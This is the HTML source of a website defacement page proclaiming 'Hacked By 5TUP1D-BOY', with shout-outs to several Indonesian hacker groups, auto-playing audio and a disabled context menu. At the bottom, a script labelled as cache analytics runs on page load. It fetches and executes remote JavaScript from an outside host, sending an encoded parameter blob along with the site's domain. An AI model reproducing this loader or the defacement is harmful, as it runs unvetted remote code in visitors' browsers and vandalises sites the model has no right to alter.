<html>

   <head>

      <title> Hacked By 5TUP1D-BOY</title>

<link rel="icon" type="image/x-icon" href="https://playpay.id/icongame/me.png">

<meta content='>'Hacked By 5TUP1D-BOY' name='description'/>

<meta content='Hacked By 5TUP1D-BOY' name='keywords'/>

<meta content='Hacked By 5TUP1D-BOY ' name='Abstract'/>

<meta name="title" content="Hacked By 5TUP1D-BOY">

<meta name="description" content="Hacked By 5TUP1D-BOY">

<meta name="keywords" content="Hacked By 5TUP1D-BOY">

<meta name="googlebot" content="index,follow"/>

<meta name="robots" content="all"/>

<meta name="robots schedule" content="auto"/>

<meta name="distribution" content="global"/>

<meta contact='#'/>

  <style>

            html, body {

                background-color: #000

               ;

                color: #636b6f;

                font-family: 'Fredericka the Great', sans-serif;

                font-weight: 100;

                height: 100vh;

                margin: 0;

            }



            .full-height {

                height: 100vh;

            }



            .flex-center {

                align-items: center;

                display: flex;

                justify-content: center;

            }



            .position-ref {

                position: relative;

            }



            .content {

                text-align: center;

            }



            .title {

                font-size: 36px;

                padding: 20px;

            }

        </style> 



    </head>



<body align="center" oncontextmenu="return false" bgcolor="black"><div class="error">

<script type="text/javascript">

</script>

<div class="flex-center position-ref full-height">

            <div class="content">

     <embed src="http://ptpn5.co.id/disposisi/feast.mp3" type="audio/mpeg" autostart="true" loop="true" height="0" width="0">

<center>

<table height="100%" width="100%"><td align="centeR"><img height="400" width="500" src="https://media0.giphy.com/media/l4FGk7QngyoLUbnm8/giphy.gif" />

                <div class="text"> 

                    <font color="white"><code><font size="6"><i>Hacked By 5TUP1D-BOY<br> </div>

                    <font color="white"><code><font size="6"><i><br> </div>

                    <font color="white"><code><font size="6"><i>Do You Still Remember Me..?<br> </div>

                    <font color="white"><code><font size="6"><i><br> </div>

                    <font color="white"><code><font size="6"><i><br>666hostHere502 - Xeit666host - T14RB373T - Mr.L3gacy - Mr.Donuts - ./PenggilaJav07 - HellMe - Unational - NoiseCrusT -  5TUP1D-B0Y </div>

                    <font color="white"><code><font size="6"><i><br> </div>

                    <font color="white"><code><font size="6"><i>Garuda Security Hacker - AnarchoXploit - Phantom Ghost - Hidden Ghost Team - Lamongan Xploiter<br></div>

</div>

<script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "p01.notifa.info/3fsmd3/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582JQuX3gzRncXOE7HYfCIv1K%2fwqffYJyLLfxILdCfO%2bjIEWDgD6iduTHItOTjsYJZbb7Tfs%2bigcChYiCWMjMJ5Eex3%2fdokoucT76OY9yRVl9im4ubRIKgaWawTSp32GMGpRaZY56QM1XELf%2bY%2f%2fOlCFj3zaGI1VCyWDdqP%2bvBN0ZQkPTo2Qh2AHD1MJgKE0LaBh%2fE4xP8PLnEiyIsXG9tmSe8qiKcbxsEEaR5nu0d6tPrCtySU1V3AxCnpwgLBfOtLapItTWG3t2D1SjualI7bXdX5IO9rUBj25fZ6eXhcc9GrEI0ueCH6nzTbdN41rgMpKV4z8EwOjLv1%2bOC5lkc47HLQ53YWfsNC0f0tUKVPq%2byyv8gY1q%2fVNtHLQUgfYL5rEm1KyU9454GXwUWC%2fqH7l%2b06kafqxVTQBH%2fhqqIOxOm63BYmryr18HU0VaLKs2EaU%2fdvTwvvHhBhOQOCQTspvEntquymteuBvnKTq7WT3y%2bCbHePsjS9W95eNl2850wm8y1god%2bZM4kKo8YfIst9CU98tOu5WkVIZvG3ltEhJ%2fhS0I4wf2UPAjNHNxhLt9G181P5J%2bEnymM" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></body>

</html>
